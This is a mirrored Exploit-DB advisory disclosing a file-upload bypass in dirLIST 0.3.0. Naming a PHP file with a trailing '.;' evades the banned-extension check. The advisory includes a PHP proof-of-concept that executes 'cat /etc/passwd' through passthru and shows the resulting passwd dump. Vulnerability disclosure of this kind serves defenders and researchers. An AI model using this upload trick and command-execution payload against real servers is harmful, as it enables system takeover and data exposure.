bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/41083.txt
Offensive Security 19000e5589 DB: 2017-01-18 
4 new exploits

MkPortal 1.1.1 reviews / Gallery modules - SQL Injection
MKPortal 1.1.1 reviews / Gallery modules - SQL Injection

Joomla! Component GigCalendar 1.0 - SQL Injection
Joomla! Component gigCalendar 1.0 - SQL Injection
Joomla! Component RD-Autos 1.5.5 - 'id' SQL Injection
mkportal 1.2.1 - Multiple Vulnerabilities
Blue Eye CMS 1.0.0 - (clanek) Blind SQL Injection
Free Bible Search PHP Script - 'readbible.php' SQL Injection
Joomla! Component RD-Autos 1.5.5 - SQL Injection
MKPortal 1.2.1 - Multiple Vulnerabilities
Blue Eye CMS 1.0.0 - 'clanek' Parameter Blind SQL Injection
Free Bible Search PHP Script - SQL Injection

Simple PHP NewsLetter 1.5 - (olang) Local File Inclusion
Simple PHP NewsLetter 1.5 - Local File Inclusion

Joomla! Component Gigcal 1.x - 'id' SQL Injection
Joomla! Component Gigcal 1.x - 'id' Parameter SQL Injection

SCMS 1 - 'index.php p' Local File Inclusion
SCMS 1 - Local File Inclusion

Max.Blog 1.0.6 - (show_post.php) SQL Injection
Max.Blog 1.0.6 - 'show_post.php' SQL Injection
Max.Blog 1.0.6 - (submit_post.php) SQL Injection
Max.Blog 1.0.6 - (offline_auth.php) Offline Authentication Bypass
Max.Blog 1.0.6 - 'submit_post.php' SQL Injection
Max.Blog 1.0.6 - 'offline_auth.php' Offline Authentication Bypass

Joomla! Component com_simplefaq - 'catid' Blind SQL Injection
Joomla! Component com_simplefaq - 'catid' Parameter Blind SQL Injection

dirLIST - Multiple Local File Inclusion / Arbitrary File Upload Vulnerabilities
dirLIST 0.3.0 - Local File Inclusion
dirLIST 0.3.0 - Arbitrary File Upload
BoZoN 2.4 - Remote Code Execution
Check Box 2016 Q2 Survey - Multiple Vulnerabilities
Openexpert 0.5.17 - SQL Injection
2017-01-18 05:01:17 +00:00

165 lines
No EOL
4.5 KiB
Text
Executable file
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

+]###################################################################################################
[+] Credits / Discovery: John Page
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/DIRLIST-FILE-UPLOAD-BYPASS-CMD-EXEC.txt
[+] ISR: Apparition
[+]##################################################################################################
Vendor:
===============
sourceforge.net
Product:
===============
dirList v0.3.0
Download:
===========
sourceforge.net/projects/dir-list/
dirLIST displays files and folders in a given HTTP/FTP directory. It has a wonderful interface with choice of Thumbnail or List
view along with gorgeous icons for different file types. Includes a sleek gallery, web based mp3 player, file admin + more.
Vulnerability Type:
======================================
Bypass File Upload / CMD Execution
CVE Reference:
===============
N/A
Security Issue:
===============
When uploading "Banned" file types dirLIST replies with a base64 encoded error message.
e.g.
dXBsb2FkX2Jhbm5lZA==
Decoded it reads, "upload_banned".
Banned files are setup in the "config.php" file.
$banned_file_types = array('.php', '.php3', '.php4', '.php5', '.htaccess', '.htpasswd', '.asp', '.aspx');
When upload a file, the check is made for banned file types.
In "process_upload.php" on Line: 47
if(in_array(strtolower(strrchr($file_name, ".")), $banned_file_types))
{
header("Location: ../index.php?folder=".$_POST['folder']."&err=".base64_encode("upload_banned"));
exit;
}
However, appending a semicolon ";" to end of our PHP file will skirt the security check allowing
us to upload a banned PHP file type, and our PHP file will be executed by server when accessed later.
Apache manual:
“Files can have more than one extension, and the order of the extensions is normally irrelevant. For example, if the file welcome.html.fr
maps onto content type text/html and language French then the file welcome.fr.html will map onto exactly the same information. etc..
Therefore, a file named file.php.1, can be interpreted as a PHP file and be executed on server.
This usually works if the last extension is not specified in the list of mime-types known to the web server.
Developers are usually unaware of the "Apache" feature to process files with some odd unexpected extension like PHP.1, PHP.; and such.
Tested on:
Windows 7
Bitnami wampstack-5.6.29-0.
Apache/2.4.23 (Win64)
Linux
XAMPP 5.6.8-0
Apache/2.4.12 (Unix)
Exploit/POC:
============
1) Create a banned PHP file to upload named.
"TEST.php.;"
2) Upload to server using dirLIST.
3) Done!
<?php
echo passthru('cat /etc/passwd');
?>
Result:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message
bus:/:/sbin/nologin avahi:x:70:70:Avahi
daemon:/:/sbin/nologin
etc...
Network Access:
===============
Remote
Impact:
=================
System Takeover
Severity:
===========
High
Disclosure Timeline:
=====================
Vendor Notification: No Replies
January 17, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c) HYP3RLINX
Reference in a new issue View git blame Copy permalink